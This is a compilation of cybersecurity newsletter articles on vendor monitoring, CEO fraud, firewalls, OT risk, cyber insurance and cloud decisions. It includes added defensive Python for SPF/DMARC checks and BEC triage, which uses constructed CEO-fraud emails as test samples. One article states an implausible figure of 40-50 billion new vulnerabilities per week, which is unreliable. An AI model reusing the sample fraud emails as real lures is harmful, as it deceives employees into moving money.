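The SPF check the outsourcer wants, and the taxonomy’s “adverse form only” rule, carried into code as an added example (not the Shared Assessments taxonomy or any SRS vendor’s tooling). The DNS answers are constructed, and the event names are placeholders; a real checker would query TXT records with a resolver library.

```python
"""Adverse-form findings for email-spoofing controls (SPF, DMARC).

Added example. DNS answers below are constructed; event names are placeholders
that follow the taxonomy rule of stating every event in its adverse form.
"""
import re
from dataclasses import dataclass

# Constructed TXT answers keyed by the name that would be queried.
FAKE_DNS_TXT = {
    "vendor-a.example": ["v=spf1 ip4:203.0.113.0/24 include:_spf.mail.example -all"],
    "_dmarc.vendor-a.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@vendor-a.example"],
    "vendor-b.example": ["v=spf1 include:_spf.mail.example ?all",
                         "google-site-verification=abc123"],
    "_dmarc.vendor-b.example": [],
    "vendor-c.example": [],
    "_dmarc.vendor-c.example": ["v=DMARC1; p=none"],
}


@dataclass(frozen=True)
class Finding:
    event: str      # adverse-form event name (placeholder)
    domain: str
    detail: str


def spf_record(txts):
    """Return the SPF record, or None when absent or duplicated (RFC 7208 allows one)."""
    recs = [t for t in txts if t.lower().startswith("v=spf1")]
    return recs[0] if len(recs) == 1 else None


def spf_all_qualifier(record):
    """Qualifier on the 'all' mechanism: '-', '~', '?' or '+' (the default)."""
    m = re.search(r"(?:^|\s)([-~?+]?)all(?:\s|$)", record, re.IGNORECASE)
    if not m:
        return None  # no 'all' mechanism: unlisted senders get a 'neutral' result
    return m.group(1) or "+"


def dmarc_policy(txts):
    """Return the DMARC 'p' tag ('none', 'quarantine', 'reject') or None if no record."""
    recs = [t for t in txts if t.lower().startswith("v=dmarc1")]
    if not recs:
        return None
    tags = {}
    for part in recs[0].split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip().lower()
    return tags.get("p", "none")


def assess_domain(domain, dns=FAKE_DNS_TXT):
    """Emit adverse-form findings only; a control that is present produces nothing."""
    findings = []
    spf = spf_record(dns.get(domain, []))
    if spf is None:
        findings.append(Finding("SPF_RECORD_MISSING", domain, "no valid v=spf1 TXT record"))
    else:
        q = spf_all_qualifier(spf)
        if q in ("?", "+", None):
            findings.append(Finding("SPF_POLICY_PERMISSIVE", domain,
                                    f"'all' qualifier is {q!r}; unauthorized senders are not rejected"))
    policy = dmarc_policy(dns.get(f"_dmarc.{domain}", []))
    if policy is None:
        findings.append(Finding("DMARC_RECORD_MISSING", domain, "no v=DMARC1 TXT record at _dmarc"))
    elif policy == "none":
        findings.append(Finding("DMARC_POLICY_NONE", domain,
                                "p=none: monitoring only, spoofed mail is still delivered"))
    return findings


def adverse_events(provider_report):
    """Normalize a provider's per-control 'present' flags to adverse-form events.

    Provider A may report {'spf': False} ("missing: bad") and provider B {'spf': True}
    ("present: good"); both map onto the single event SPF_RECORD_MISSING, which is
    emitted only when the control is absent, so the condition is never described twice.
    """
    names = {"spf": "SPF_RECORD_MISSING", "dmarc": "DMARC_RECORD_MISSING"}
    return sorted(names[c] for c, present in provider_report.items()
                  if c in names and not present)


if __name__ == "__main__":
    for d in ("vendor-a.example", "vendor-b.example", "vendor-c.example"):
        for f in assess_domain(d):
            print(f"{f.domain}: {f.event} ({f.detail})")
```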
Among the key definitions in The Unified Third Party Continuous Monitoring Cybersecurity Taxonomy are
the following:
• Monitoring Surface: Cataloging of technical or organizational characteristics that help identify the
presence of other events or states, such as domain names, Internet Service Providers, email service
providers, and IP addresses, to help stakeholders better understand how SRS providers identify events.
This category of definitions includes those for fingerprint values and attack surface variables, such as
those associated with assets that can be used to understand the scope, strengths, and weaknesses of
an organization’s business and technical environment. Surface variables can determine whether a
control or vulnerability does or does not exist.
• Events: Actual cybersecurity vulnerabilities indicating a lack of a control that a monitored organization
may be exposed to. Domains and categories include:
o Business Intelligence: The range of categories such as reputational exposure, business metric
changes, security incidents, and other events.
o Indicators of Compromise: Including active and passive signals. Active, such as dangerous activity
that is occurring and picked up in real time or near-real time; passive, such as lists, credential leaks,
and exposed information.
• Vulnerabilities: Defining the full constellation of areas of potential risk across the spectrum of cyber
elements such as DNS, email, web applications, remote access, practices, network services, client
applications, network, and cloud security.
A “River of Risk”
One of the biggest problems seen by Shared Assessments’ “group of rivals” is slow patching cadence.
With 40-50 billion (with a B) vulnerabilities cropping up per week, slow patching continues to be a major
problem. In descending order, other issues include Distributed Denial of Service (DDoS) attack
mitigation, End-of-Life systems remaining online, and systems online after End-of-Support.
According to the CSC 2021 Domain Security Report on Forbes Global 2000 companies:
• 81% did not use Registrar-Lock Protocol
• 50% did not use DMARC (Domain-based Message Authentication, Reporting & Conformance)
• 89% did not use DKIM (DomainKeys Identified Mail, an email authentication method to detect forged
sender addresses)
• 60% of “homoglyph” domains (to catch typos like “amuzon”) were registered in the last two years.
According to the rivals, simple and effective mitigations include:
• TLSv1.3 adoption
• HTTP Strict-Transport-Security response header (HSTS headers)
• OWASP Top 10 (updated September 2021)
• Center for Internet Security (CIS) Critical Security Controls (v8 updated May 2021)
The taxonomy is an industry effort and a living document, maintained by Shared Assessments. It is the
most recent result of a two-phase cooperative project led by the Shared Assessments Continuous
Monitoring Working Group, established in 2017, which galvanized practitioners from over 55 member
organizations. The first phase was published as an article in 2019, “Creating a Unified Continuous
Monitoring Cybersecurity Taxonomy: Gaining Ground by Saying What’s What.” The second phase is the
taxonomy itself.
A copy of the Shared Assessments Unified Third Party Continuous Monitoring Taxonomy can be obtained
for free, and the SRS firms explain its benefits in the webinar “Cybersecurity Taxonomy for Continuous
Monitoring.”
About the Author
Charlie Miller, Senior Advisor, Shared Assessments, CTPRP,
Distinguished Ponemon Fellow - Charlie is a frequent speaker and a
recognized expert in Third-Party Risk. His key responsibilities include
expanding the Shared Assessments Third-Party Risk Management
membership-driven program, facilitating thought leadership, industry
vertical strategy groups, continuous monitoring / operational
technology working groups, and IoT research studies.
He joined Shared Assessments in 2015 and has been in the third-party
risk space for over 15 years. He has vast industry experience, having
set up and led third-party risk management and financial services
initiatives for several global companies.
Charlie was the Director of Vendor and Business Partner Risk Management at AIG and implemented
third-party risk management programs at Bank of Tokyo Mitsubishi (BTMU). He held multiple leadership
roles at Merrill Lynch & Co., Inc. overseeing the company’s global vendor management program and a
Director of Technology Audit. He led a financial services practice unit as a consulting partner at Deloitte,
focusing on technology outsourcing, risk management, and cost control. He began his career at IBM as
a systems engineer.
Charlie is a Distinguished Fellow of the Ponemon Institute, a Certified International Privacy Professional,
and Certified Third-Party Risk Professional.
Connect with Charlie via email or through LinkedIn, and at https://sharedassessments.org/
What is Business Email Compromise?
A Guide to CEO Fraud
By Shanna Utgard, Senior Cyber Advocate, Defendify
"URGENT - Are you available? I need you to take care of a pending invoice from one of our contractors.
I'm in a meeting and can't talk, but we have to handle it ASAP."
You may have received a message like this or know someone who has. This is an example of a specific
type of spear-phishing attack known as Business Email Compromise (BEC) that targets individuals with
access to sensitive or financial data.
Cyber attackers use evolved social engineering techniques to take advantage of human interactions to
manipulate employees into breaking standard security procedures or ignoring best practices. Even with
traditional cybersecurity measures in place, these cybercriminals can gain unauthorized access to an
organization's systems, networks, and information through its employees, often without their knowledge.
How Cyber Criminals Leverage Research and Social Engineering
The FBI defines BEC as a “sophisticated scam targeting businesses working with foreign suppliers
and/or businesses that regularly perform wire transfer payments.” The message above is an example of
a CEO impersonation scam, a growing type of BEC attack that attempts to trick employees into thinking
a high official at their company needs them to send money, and fast.
Also called CEO fraud, this tactic relies on a sense of urgency and authority while playing off employees'
desire to be helpful and do a good job. According to the FBI Internet Crime Complaint Center's (IC3) 2021
Internet Crime Report, BEC schemes were the costliest type of attack, with an adjusted loss of
approximately $2.4 billion last year.
Before conducting these BEC schemes, the threat actors do their homework. They peruse the company
website, social media pages, media coverage, and other publicly available data sources to collect
information on their target organization. This research may include details about executive and high-level
employees, new hiring announcements, travel plans or similar out-of-office notifications, company news,
and other notable projects or events. In the CEO fraud example, they will identify key targets and spoof
a trusted persona to ensure the best chance of success. These scams have even evolved to include
SMS text messages, personal emails or social media accounts, and personal devices, such as cell
phones.
Cybercriminals use the information collected to target employees and persuade them to divulge
confidential information or sensitive data that bad actors may use for fraudulent purposes.
BEC's common goals include convincing employees to click on a link and provide log-in credentials, send
sensitive data, perform a financial transaction (wiring money, purchasing gift cards), or open malicious
attachments.
Other types of Business Email Compromise:
• CEO Impersonation: as mentioned above, this tactic involves spoofing a message from an executive,
requesting employees perform some action, such as sending a wire or other financial transaction,
providing employee W-2s, purchasing gift cards, etc.
• Fake Invoice Scams: attackers spoof an email with an invoice from a vendor or third party that an
organization regularly works with, but with updated payment information.
• Data Theft: HR personnel are targeted to obtain sensitive data such as employee or company tax
information, or attackers pose as employees and send new payroll direct deposit instructions.
• Account Compromise: email accounts are compromised and are used to send out invoices or requests
for payment to attacker-controlled accounts.
If an employee falls for these tactics, it could result in damage far beyond personal embarrassment.
Providing passwords to bad actors, sending funds or sensitive data to an attacker, and ransomware
delivered through the click of a link can all have wide-reaching effects on the entire organization.
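The indicators described above (an executive’s name on an outside address, a Reply-To that points elsewhere, failed sender authentication, urgency plus a payment request) can be scored mechanically before a message reaches the inbox. The following is an added example, not Defendify’s tooling; the internal domain, the executive roster and the three messages are constructed.

```python
"""Heuristic triage of inbound mail for CEO-fraud / BEC indicators (added example).

INTERNAL_DOMAIN, EXECUTIVES and the sample messages are constructed placeholders.
"""
import re
from email import message_from_string
from email.utils import parseaddr

INTERNAL_DOMAIN = "acme.example"                      # constructed
EXECUTIVES = {"jane doe": "jane.doe@acme.example"}    # constructed display-name roster

URGENCY = re.compile(r"\b(urgent|asap|immediately|right away|can'?t talk|in a meeting)\b", re.I)
PAYMENT = re.compile(r"\b(wire|wire transfer|invoice|gift cards?|direct deposit|w-?2s?)\b", re.I)
HOLD_THRESHOLD = 4  # at or above this score, hold the message for out-of-band verification

# Constructed: executive display name on a lookalike domain, with a redirected Reply-To.
SAMPLE_LOOKALIKE = """\
From: Jane Doe <jane.doe@acme-example.net>
Reply-To: jane.doe.ceo@mail.example
To: accounts@acme.example
Subject: URGENT - Are you available?
Authentication-Results: mx.acme.example; spf=none; dmarc=none

I need you to take care of a pending invoice from one of our contractors.
I'm in a meeting and can't talk, but we have to handle it ASAP. Wire today.
"""

# Constructed: exact-domain spoof that fails SPF and DMARC at the receiving gateway.
SAMPLE_SPOOF = """\
From: Jane Doe <jane.doe@acme.example>
To: assistant@acme.example
Subject: quick favor
Authentication-Results: mx.acme.example; spf=fail; dmarc=fail

Please purchase five gift cards immediately and send me the codes.
"""

# Constructed: ordinary internal message that should pass untouched.
SAMPLE_LEGIT = """\
From: Jane Doe <jane.doe@acme.example>
To: accounts@acme.example
Subject: Q3 planning agenda
Authentication-Results: mx.acme.example; spf=pass; dkim=pass; dmarc=pass

Attached is the agenda for Thursday. No action needed before then.
"""


def _domain(address):
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def bec_indicators(raw_message):
    """Return (score, reasons) for one RFC 5322 message given as a string."""
    msg = message_from_string(raw_message)
    display, addr = parseaddr(msg.get("From", ""))
    _, reply = parseaddr(msg.get("Reply-To", ""))
    from_domain, reply_domain = _domain(addr), _domain(reply)
    text = f"{msg.get('Subject', '')}\n{msg.get_payload()}"
    auth = {k.lower(): v.lower() for k, v in
            re.findall(r"\b(spf|dkim|dmarc)=(\w+)", msg.get("Authentication-Results", ""), re.I)}
    score, reasons = 0, []

    # 1. A known executive's display name on an address that is not their mailbox.
    roster_addr = EXECUTIVES.get(display.strip().lower())
    if roster_addr and addr.lower() != roster_addr:
        score += 3
        reasons.append(f"display name '{display}' is an executive but address is {addr}")
    # 2. Replies are steered to a different domain than the apparent sender.
    if reply_domain and reply_domain != from_domain:
        score += 2
        reasons.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")
    # 3. Mail claiming our own domain that did not pass DMARC (or failed SPF).
    if from_domain == INTERNAL_DOMAIN and (auth.get("dmarc") != "pass" or auth.get("spf") == "fail"):
        score += 2
        reasons.append(f"internal sender with authentication results {auth or 'absent'}")
    # 4. Pressure and a money-movement request, the hallmarks of CEO fraud.
    if URGENCY.search(text):
        score += 1
        reasons.append("urgency language")
    if PAYMENT.search(text):
        score += 2
        reasons.append("payment or sensitive-data request")
    return score, reasons


def triage(raw_message):
    """'hold' for out-of-band verification, otherwise 'deliver'."""
    score, _ = bec_indicators(raw_message)
    return "hold" if score >= HOLD_THRESHOLD else "deliver"


if __name__ == "__main__":
    for name, sample in (("lookalike", SAMPLE_LOOKALIKE), ("spoof", SAMPLE_SPOOF), ("legit", SAMPLE_LEGIT)):
        score, reasons = bec_indicators(sample)
        print(name, triage(sample), score, reasons)
```

A held message is routed to the verification step the article recommends (a call-back or a second approver), not silently dropped.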
Implementing Comprehensive Cybersecurity
We often come back to the pillars of comprehensive cybersecurity: leveraging people, processes, and
technology to defend against current and future threats. Applying an adaptable approach to CEO fraud
and other BEC scams can go a long way in protecting organizations from evolving tactics, especially with
the new challenges of working in a hybrid or remote world.
Employees are often the first and last line of defense against cyberattacks like BEC. They should receive
proper training and guidance to recognize and respond to potential threats. Conducting cybersecurity
training on an annual (or even quarterly) basis is no longer enough, as threat actors change tactics
frequently and awareness dwindles over time. New employees are prime targets for BEC attacks, so it is
advantageous to begin their cyber education during their initial onboarding and orientation. Organizations
should conduct frequent, engaging training and encourage employees to be on high alert for any scams
they might encounter. With the recent move to a hybrid or remote workforce, many organizations
implement collaborative cloud-based tools to stay connected. It is now more important than ever to
communicate clear policies for these urgent requests, particularly for new employees who may have
never met their colleagues in person.
You may decide to require multiple signatures or approvals, direct face-to-face or telephone verification,
or another established process.
Provide a clear and easy way for employees to report suspicious activity or that they have fallen victim
to social engineering attacks, including CEO fraud. An incident response plan for BEC is crucial to
mitigate the possible repercussions of such an attack. The faster fraud is reported, the higher the chance
any funds or data might be recoverable.
Finally, implementing basic cybersecurity measures can go a long way in preventing widespread impact
in the event of a BEC attack. Provide tools for employees to easily create and use unique passwords and
enable multi-factor authentication to make it more difficult for cybercriminals to take over email and other
valuable accounts.
Through regular, engaging awareness training, simple and clear policies, and secure technology, every
employee, from the (real) CEO to the intern, can go a long way toward keeping their organization safe.
About the Author
Shanna Utgard is the Senior Cybersecurity Advocate at Defendify,
the all-in-one cybersecurity platform that makes cybersecurity
possible for ALL businesses. Shanna is an award winning channel
manager and a frequent speaker on how organizations can
develop a comprehensive program that is simple, affordable, and
works around-the-clock on multiple levels. Email her at
sutgard@defendify.com or get in touch with the team at
Defendify.com.
Firewalls Aren’t Enough to Protect Against Evolving Cyber Threats
By Pat McGarry, CTO, ThreatBlockr
The Cybersecurity and Infrastructure Security Agency (CISA) recently added 66 vulnerabilities to its list
of known exploited security holes, including a WatchGuard firewall vulnerability exploited in attacks linked
to a Russian state-sponsored threat actor. CISA’s call to patch this vulnerability follows on the heels of
last year’s Colonial Pipeline attack, as well as other cybersecurity incidents where firewalls were
breached. Whether the threat came in through the front door or not, every successful cyberattack has
breached a firewall at some point.
There’s no denying that cybercriminals are growing increasingly sophisticated; just look at the headlines
from recent years. Unfortunately, despite industry innovation and government guidance, what
organizations are doing to protect themselves has largely remained the same. We’re seeing it more and
more: firewalls are becoming antiquated when compared to the sophisticated technologies used by
cybercriminals. It’s high time for organizations to acknowledge the firewall gaps and take steps to build
more robust cybersecurity defenses.
While firewalls can detect attacks within an organization’s network, they don’t work when the attacker is
already inside. Advanced firewall solutions may be able to identify unusual behavior, but they can’t
prevent the exfiltration of account data from within the authorized account. Firewalls only use a limited
amount of cyber intelligence and have limited ability to handle additional cyber intelligence sources,
allowing threats to sneak past. Not to mention, managing the small amount of threat intelligence you can
add to a firewall is slow due to its manual nature. This “firewall gap” problem creates challenges for
organizations when it comes to updating their cybersecurity defenses and securing their networks.
Gap #1: Firewalls detect and block threats using their own proprietary threat intelligence, which
represents a narrow view of the threat landscape. When defending against threats is a volume
game that requires huge amounts of cyber intelligence from multiple sources, no single source of
threat intelligence or existing security control can cover the entirety of the threat landscape alone.
For effective threat detection, organizations need threat intelligence from multiple sources.
Gap #2: Firewalls have limited ability to add threat intelligence, and while adding additional threat
feeds in an attempt to close this firewall gap is great in theory, it is significantly more challenging
in practice. Firewalls also have limited ways you can integrate data into them. Firewalls were not
designed to work with large volumes of third-party threat feeds, and they do a variety of different
things today (many that they weren’t originally designed to do), all of which require significant
resources.
Gap #3: Lastly, for most organizations, the process of managing threat intelligence in firewalls is
manual and involves updating external blocklists directly on the firewall. Even with automated
blocklist capabilities, many organizations must also account for firewall changes to go through a
change management process driven by compliance requirements, which adds additional time to
updating blocklists.
The threat intelligence volume limits of firewalls combined with the dynamic nature of threat intelligence
amplify these problems. Threats are rapidly changing and so is threat intelligence, and this dynamic
nature makes it nearly impossible and impractical to manage manually. Multi-source cyberintelligence
should include commercial threat intelligence providers, open source intelligence (OSINT), government
cyber intelligence, and industry threat intelligence to assist organizations in effectively detecting and
blocking threats. With this wide array of cyber intelligence available combined with the fact that
organizations also generate their own valuable intelligence, it’s critical to have the flexibility to add more
sources of intelligence and an integration process that doesn’t delay an organization’s ability to rapidly
respond to threats.
The Colonial Pipeline, JBS, Volkswagen, and ParkMobile incidents all have one thing in common: They
all had firewalls protecting their networks but they were still breached. While firewalls continue to provide
an important layer of network protection, they can’t protect a network on their own. With gaps like the
limited view of threat intelligence that firewalls use to detect and block threats combined with a limited
ability to significantly increase the intelligence of your firewall, your network is only partially protected
from today’s cyber threats.
As cybercriminals become increasingly sophisticated and their attack vectors evolve, we must too.
Organizations can no longer protect against real-time data threats with an approach based on reactive
legacy solutions. To keep pace with the cyber threats of today and tomorrow, organizations need real-
time threat intelligence from multiple sources and automated protection to defend their network in every
moment.
About the Author
Pat McGarry has more than 25 years of hands-on experience
in all aspects of hardware and software development, to
include iterative requirements analysis, architecture,
engineering, test, managerial, and leadership roles. His skills
have been brought to bear across a wide variety of technology-
related disciplines including embedded systems design,
network systems analysis and design, advanced network
testing, cybersecurity, deployable machine learning and
artificial intelligence, internet of things, big data, advanced data
analytics, and high-performance heterogeneous computing.
He has been granted three US patents and has spoken at a
variety of user and industry conferences. He received
bachelor’s degrees in Computer Science (BSCS, ’93) and
Electrical Engineering (BSEE, ’94) along with a minor in Mathematics, all from Virginia Tech.
Pat can be found on LinkedIn and on the ThreatBlockr website at ThreatBlockr.com.
The Top Five Reasons You Should Take Operational
Technology Cybersecurity Seriously
How to Protect Critical Infrastructure During This Unprecedented Time
By Matthew Morris, Global Managing Director, 1898 & Co.
The newest trends in political warfare include cyberattacks on infrastructure security with hackers looking
to generate massive setbacks in 2022 and beyond. With conflict escalating overseas, there’s been much
conversation about what precautions should be taken to protect U.S. businesses from losing everything
in an attack perpetrated by bad actors looking to exact chaos, sabotage, extort money, or all of the above.
What’s the answer to such a daunting problem? It's simple: the proactive inclusion of operational
technology security measures for every critical infrastructure related business - refineries, utilities, plants,
pipelines, and municipalities. Here are the top five reasons you should take OT cybersecurity seriously.
1. New Trends in Political Warfare
Advanced cyber weaponry has redefined the current political landscape, making it easier for
cybercriminals operating within countries like Russia to cripple entire organizations from overseas. The
Russia-Ukraine crisis is already impacting the daily lives of Americans in various ways, including
spiking gas prices.
But it could get so much worse. Hackers are no longer focused on size or scope, and every organization
is at risk. Cyber-related sabotage may or may not be reserved for individual businesses. Instead, poorly
designed and executed malware or ransomware could affect all aspects of the U.S., including all aspects
of our critical infrastructure, e.g. banks, power plants, water treatment facilities and communications. We
are entering an entirely new era of war, where weapons leave the physical domain and enter the digital
one: unseen, behind-the-scenes attacks that will go unnoticed without the proper protections.
2. The Cybersecurity Labor Shortage is Real
The global cybersecurity talent shortage reached an estimated 3.5 million workers in 2021. Industry
experts warned of this dynamic for the past several years; however, the demand for skilled workers
continues to outstrip supply. Coupled with a growing threat landscape, asset owners are at risk.
For OT environments, the talent shortage is further impacted by managed services providers that have
focused on the IT side of the house. They offer IT cybersecurity services, but they lack an understanding
of and the right capabilities for protecting OT. Firms often don’t understand OT environments, how they
work, and how to restore them after an attack. They have limited knowledge of industrial control systems
and other similar technologies. Many of these managed services vendors also “don’t know what they
don’t know,” and tell companies they can help them with IT and OT, despite their knowledge gaps.
These firms need to stop stating they have these capabilities. People will realize it’s a serious industry
problem that requires OT specialization and expertise. However, in the current environment, OT
cybersecurity experts are hard to find, can be prohibitively expensive, and are difficult to retain. With OT-
focused managed security services, critical infrastructure companies can manage their risk better while
remaining focused on their core missions.
3. Security Loopholes Are Common
Inherent software vulnerabilities allow for more data flow and connections, which correlates with attacks.
This makes the stakes for identifying OT security headaches and diminishing risks extraordinarily high.
OT security isn’t just an internal concern, relegated to the halls of individual organizations. It’s a national
consideration. In April 2021, the White House unveiled a 100-day cybersecurity effort to protect the
nation’s power grid amidst increasing concerns regarding the state of the nation’s cybersecurity
vulnerabilities. The effort was followed by an attack on a major oil resource, the Colonial Pipeline, further
emphasizing the need for increased provisions. Repercussions of the hack were widespread, as the
Colonial Pipeline is one of the largest oil suppliers in the country. The attack forced the corporation to
shut down operations, generating supply shortages and higher fuel prices.
4. Limit Long Term Damage with OT
An OT incident could do more than cause an immediate headache and require damage control. The
effects could last long-term. An ounce of prevention today will protect against the catastrophic possibilities
of being hacked tomorrow.
OT systems are comprised of highly complex technologies, making it even easier for complications to
occur and go unnoticed. These attacks could cost organizations millions, even billions, in loss and
recovery. Cybersecurity Ventures predicted that cybercrime would cost companies $6 trillion in 2021 and
cybercrime costs are expected to grow 15 percent per year reaching $10.5 trillion by 2025. The financial
incentive to protect cyber assets is a large one, not to mention the impact an attack could have on the
surrounding communities, company employees, and overall revenue.
5. Threats to Human Life Set OT In a Class of Its Own
Approximately 9.2 trillion gallons of water cover 247 square miles leading to the iconic Hoover Dam,
enough water to fill the Great Salt Lake in Salt Lake City, Utah twice. Now, imagine the entirety of the
Great Salt Lake flooded over the states of Nevada and Arizona. A cybersecurity attack on the Hoover
Dam could do just that and there are similar concerns for many major utility companies that house
thousands of gallons of oil and water.
One well-planned attack on a water, oil, or gas company could spell trouble for an entire region of the
country, impacting communities, businesses and schools, and costing millions, even billions, of dollars in
loss and recovery. A recent Gartner study predicts that cyber attackers will have weaponized operational
technology (OT) environments to successfully harm or kill humans by 2025.
There are, however, ways to avoid the consequences of an attack. Recently, 1898 & Co. made a drastic
push to keep OT environments safe, partnering with the Idaho National Laboratory, a U.S. Department
of Energy national laboratory, to apply the patent-pending consequence-driven, cyber-informed
engineering (CCE) discipline to protect the most critical aspects of utilities; oil, gas and chemicals;
pipelines; defense industrial base; transportation; ports and maritime; and manufacturing companies. It’s
a strategy we recommend to everyone. The key to handling attacks is prevention. With OT integration,
we can keep our homeland organizations safe and secure.
About the Author
Matt Morris is a digitalization and cybersecurity
executive and author, currently serving as the
managing director for 1898 & Co., where he leads
a diverse team of ICS cybersecurity
practitioners. His mission is to serve humanity by
improving safety, security, and reliability of the
world’s critical infrastructure through resiliency,
improved situational awareness and
preparedness.
An industry luminary, Matt previously spearheaded
ICS cybersecurity programs at Cisco, Siemens,
and NexDefense. At Cisco, Matt architected and
led the world’s first managed industrial cyber security service, among other major achievements. Matt
has 26 years of strategy and technology leadership.
Matt is a highly sought-after speaker on ICS cybersecurity and an accomplished author. He has been
published in SecurityWeek, USA Today, FoxNews.com, International Business Times, CIO Insights, CIO
Review, and many other notable publications. Matt is a Certified CISO (C|CISO), holds 12 DHS ICS-CERT
certifications and an MBA degree from Emory Goizueta Business School. For more information,
visit https://1898andco.burnsmcd.com/
Not Slowing Down
The Continuous Threat of Cyber Misconduct and its Impact on Global Industry
By Kimberly Patlis Walsh, President and Managing Director of Corporate Risk Solutions (CRS)
In the lead up to Russia’s invasion of Ukraine in February, the FBI and Department of Homeland Security
issued warnings of urgent cyberattack threats against U.S. and Ukrainian governmental and commercial
networks. As recently as April 18th, a top U.S. cybersecurity official told “60 Minutes” that Vladimir Putin
likely would resort to digital warfare resulting in a cyberattack on American targets. These warnings
highlight the dire circumstances being faced worldwide as the Russian invasion continues to cause
significant damage to Ukraine’s internet infrastructure, underscoring the need for coordinated and bold
responses.
But, putting politics aside, the reality is any business that interacts with and/or depends on the internet is
a target, regardless of size. Cyber criminals’ methods have become increasingly sophisticated, and they
launch IT-directed attacks with seeming impunity. As a result, the negative repercussions for businesses
cannot be overstated. Indeed, potential targets are no longer limited to those that have personally
identifiable information, personal health information or customer credit card data. Some of the largest
cyberattacks over the last two years have not involved the mining of such information at all. Rather, these
attacks have either shut down or materially interrupted vital infrastructure, health systems, financial
companies, and manufacturing, including construction, supply chains, distribution, and sales.
The impact of these attacks can take any number of forms, including: malware, including but not limited
to, ransomware (which disables the ability to access IT-systems until a ransom is paid); business
interruption (income lost because of the inability to access systems); data restoration (reconstructing
“lost” company and customer data); social engineering/phishing (loss of money based on the
impersonation of a colleague, client or vendor); regulatory fines and penalties; liability to third-parties if
their information is compromised; and reputational harm. Estimates of losses for these events run from
$20 billion in ransomware costs alone for 2021 up to $10.5 trillion (or $20 Million per minute) expected to
be lost/spent by 2025 to respond to, address and fight these attacks globally.
According to the Cybersecurity and Infrastructure Security Agency (CISA), the FBI and the NSA, the ongoing
success of these ransomware attacks has only further encouraged cyberthieves around the globe and
should put businesses of every size on high alert throughout 2022.
Specifically, CISA has advised that ransomware attackers are focusing their attention on critical
infrastructure industries throughout the US, including:
Emergency water services
Energy sector
Communications
Financial services
Healthcare sector
Despite these grim predictions, it is imperative to remember that there are myriad tools available to
protect businesses against and mitigate the impact of cyber-related events.
Internal Security Protocols / Controls
Cybersecurity experts have identified many of the key vulnerabilities that criminals manipulate to enter
computer systems, and how to fix them, including:
Multi-factor authentication tools to safely access internal computer systems
Robust Desktop Security Protocols, including virtual private networks, data encryption, complex
passwords, firewalls, and restricted access to admin rights
Active management of systems and configurations
A continuous hunt for network intrusions and third-party exposure threats
Update and upgrade software immediately
Develop and exercise a system recovery plan, including regular testing of backups for data
integrity and restorability, and prepare and annually test an incident response/business
continuity plan
System and Information security is the primary key to mitigating cyber-related risks. Whether through in-
house personnel, engaging with outsourced cybersecurity firms or having those teams work in tandem,
many vulnerabilities can and should be addressed as an enterprise-wide project. While there is no “one
size fits all” approach to this, and it is a true investment of capital and manpower, it is imperative that
companies do an initial assessment of their cybersecurity policies and procedures. The biggest mistake
companies make in this context is believing that they are not a target because of their industry, their size,
their revenues, or their footprint. Everyone is a target, and, as such, these issues simply cannot be
ignored.
Insurance
Another key mitigation tool is purchasing a dedicated cyber insurance policy. This allows businesses to
transfer first party loss (e.g., loss to the company itself) and third-party indemnity (e.g., liability claims
against the company and regulatory proceedings) risks associated with cyber-related security breaches.
A robust cyber policy is structured around helping the company recover and handle the costs associated
with an attack and best protecting the company’s reputation. The purchase of insurance will often also
act as a catalyst for implementing the tools and processes described above as cyber insurance carriers
are increasingly demanding that most, if not all, of the items described above be in place (or be on track
to be put in place) before they even issue a quote outlining the costs and coverages potentially available.
As part of the underwriting process, carriers will analyze possible risks pertaining to the company; the
strength of IT and cybersecurity controls; compliance with legal and industry standards; and the existence
and strength of security response plans. It is vital that companies be transparent during this application
and review process, so issues do not arise in the event of a claim. Misrepresentations of material facts
requested by insurance underwriters, in this context especially with respect to cyber processes and
procedures, have led to voided coverage when such misrepresentations came to light following the notice
of a claim to the carrier. No insurance policy is worth the premium paid if it is not available in the event of
a loss.
As ransomware and other cyber security threats continue to create profound financial and operational
interruptions affecting businesses and insurance companies worldwide, it is imperative to seek an
independent risk advisor who can serve as a soundboard and navigate through the various and sudden
risks facing enterprises globally to ensure maximum recovery of data, systems and monies.
About the Author
Kimberly Patlis Walsh is President and Managing Director at
Corporate Risk Solutions.
Kimberly Patlis Walsh brings over 20 years of insurance
underwriting, program structuring, and multinational client risk
advisory representation to her Corporate Risk Solutions (CRS)
engagements. Prior to joining CRS in 2003, Kimberly served as
SVP of AIG’s Mergers & Acquisitions Group, structuring
insurance & financial solutions to a variety of corporations
(publicly traded and privately held) to limit or transfer liabilities
within corporate transactions, recapitalizations, bankruptcies
and other M&A situations. She is active in both the alternative
investment community as well as the insurance and risk community.
https://crslimited.com/
Advantage- Disadvantage Analysis for Implementing
Cloud Services
Which Methodology Do You Use to Make the Right Decision?
By Zsolt Baranya, Information Security Auditor, Black Cell Ltd.
Numerous organizations are thinking about introducing cloud-based systems or cloud services. The
decision is rather difficult and complex because of the advantages and disadvantages. Usually, the
decision makers' main arguments are the higher availability and the reduced IT operations cost compared
to an on-premises architecture.
There are legal requirements and recommendations describing the importance of an advantage-
disadvantage analysis, but there is no uniform, formalized methodology for conducting the analysis that
offers a set of criteria or a decision process.
First, the organization must identify all the legal rules that apply to introducing the cloud service, in order
to know the exact requirements. These obligations can vary greatly from country to country. There are
mandatory and discretionary requirements that the organization shall consider. The decision on the cloud
implementation shall primarily depend on the mandatory requirements.
Many organizations (subsidiaries or affiliates) depend on their parent company for the usage of
cloud-based services. In this situation, the possibilities for implementing cloud usage depend on the
parent organization.
Considering all the circumstances, organizations need a methodology or a set of criteria to make the right
decision. The following list of questions and criteria may help your organization. Each question has a score,
which is based on the priority of the question. Once you have answered all the questions, you obtain an
aggregated score on the advantage side and one on the disadvantage side. The aggregated scores can help
the decision makers. The scores (values) are only recommendations and can be changed to suit the special
needs of the organization.
No. | Question | Disadvantage if the answer is | Score
1 | Is management committed to using cloud services? If not, the whole project can fail. | No | 2
2 | Can the organization's cloud service usage rules be implemented easily? If the organization's procedures and/or rules differ greatly from those of the cloud service (provider), the implementation may become inapplicable. | No | 1,9
3 | Does the organization's information security policy allow the use of cloud services? Changing the policy is a relatively easy decision if the answer to the first question is yes. | No | 1,5
4 | Does a contract prohibit the use of the cloud service? If yes, is it possible to negotiate a change with the partner? If the contract's content cannot be changed, the disadvantage value is as follows. | Yes | 1,9
